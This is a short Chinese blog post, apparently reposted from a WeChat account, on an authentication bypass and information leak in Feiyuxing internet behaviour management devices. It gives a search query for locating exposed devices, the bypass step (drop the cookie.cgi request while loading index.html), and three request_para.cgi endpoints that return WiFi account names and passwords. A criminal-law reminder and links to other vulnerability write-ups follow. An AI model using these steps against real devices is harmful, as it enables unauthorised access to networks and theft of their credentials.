飞鱼星智能上网行为管理系统权限绕过+信息泄露漏洞

2024年1月25日14:03:59评论44 views字数 419阅读1分23秒阅读模式

飞鱼星企业级智能无线上网行为管理系统以及众多产品存在权限绕过漏洞。

title="飞鱼星"

访问 index.html 或者 home/index.html 抓包，丢掉cookie.cgi就行了

飞鱼星智能上网行为管理系统权限绕过+信息泄露漏洞

越权成功后访问下面的地址还可以获取wifi账号密码

/request_para.cgi?parameter=wifi_info      #获取ALL WIFI账号密码/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码

小知识

依据《刑法》第285条第3款的规定，犯提供非法侵入或者控制计算机信息系罪的，处3年以下有期徒刑或者拘役，并处或者单处罚金;情节特别严重的，处3年以上7年以下有期徒刑，并处罚金。

声明

原文始发于微信公众号（丁永博的成长日记）：飞鱼星智能上网行为管理系统权限绕过+信息泄露漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

飞鱼星智能上网行为管理系统权限绕过+信息泄露漏洞

某单位网址未授权导致发生的视频信息泄露

CVE-2024-4040

Craft CMS 远程代码执行漏洞复现（附nuclei POC）

漏洞预警 | Google Chrome堆缓冲区溢出漏洞

漏洞预警 | GeoNode请求伪造漏洞

漏洞预警 | Docker Desktop增强容器隔离限制绕过漏洞

漏洞预警 | D-Link D-View 8 硬编码密钥漏洞

(CVE-2023-30591) NodeBB 预身份验证拒绝服务

CVE-2023-41081：Apache Tomcat 连接器中的高严重性漏洞

禅道项目管理系统身份认证绕过[漏洞复现]

发表评论

在线咨询

微信